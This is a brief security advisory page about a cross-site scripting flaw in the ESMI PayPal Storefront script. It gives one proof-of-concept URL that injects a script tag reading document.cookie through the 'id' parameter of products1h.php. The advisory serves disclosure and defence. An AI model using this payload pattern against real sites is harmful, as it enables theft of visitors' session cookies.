• info
• discussion
• exploit
• solution
• references

ESMI PayPal Storefront Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept was supplied:
http://www.example.com/hv/ecdis/products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&id2=10&subcat=Asus&p=products1